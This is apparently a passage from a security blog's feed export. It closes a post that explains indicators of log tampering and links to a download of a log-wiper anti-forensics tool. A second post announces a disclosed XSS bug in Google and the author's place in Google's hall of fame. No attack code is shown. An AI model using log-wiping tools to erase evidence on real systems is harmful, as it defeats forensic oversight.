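Run it directly to see both indicators fire. In practice the ctime/mtime skew is the robust signal; the newest-entry check only fires when the restored mtime predates a line that survived the edit. Because classic syslog lines carry no year, the year is taken from the file's mtime, which misattributes entries only across a New Year boundary.<br />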
<a href="http://packetstormsecurity.org/files/118922/Last-Door-Log-Wiper.html" target="_blank">Download (Archive: LastDoor, LastDoor.c, README)</a> from Packetstormsecurity.org<br />
(If you find this useful, why not check out an advert below to support the blog? :O ) <span style="color: #3d85c6;"><b>~r0ng</b></span> <br />
<br />
<br />
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2511450483904536606.post-63097784303763271662012-03-01T12:46:00.000-08:002013-05-09T20:58:28.049-07:00XSS find in Google.com - on the hall of fame at last!<div style="text-align: justify;">
</div>
<div style="text-align: justify;">
<br />
<u>March update:</u><br />
<br />
Google updated their wall of fame for Jan-March (http://www.google.co.uk/about/appsecurity/hall-of-fame/reward/). I disclosed a cross-site scripting (XSS) vulnerability last month, and Google were kind enough to put me on their wall (and give me a few pennies to spend at the sweet shop). <br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/Qkv8s.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://i.imgur.com/Qkv8s.jpg" /></a></div>
<br /></div>
Unknownnoreply@blogger.com0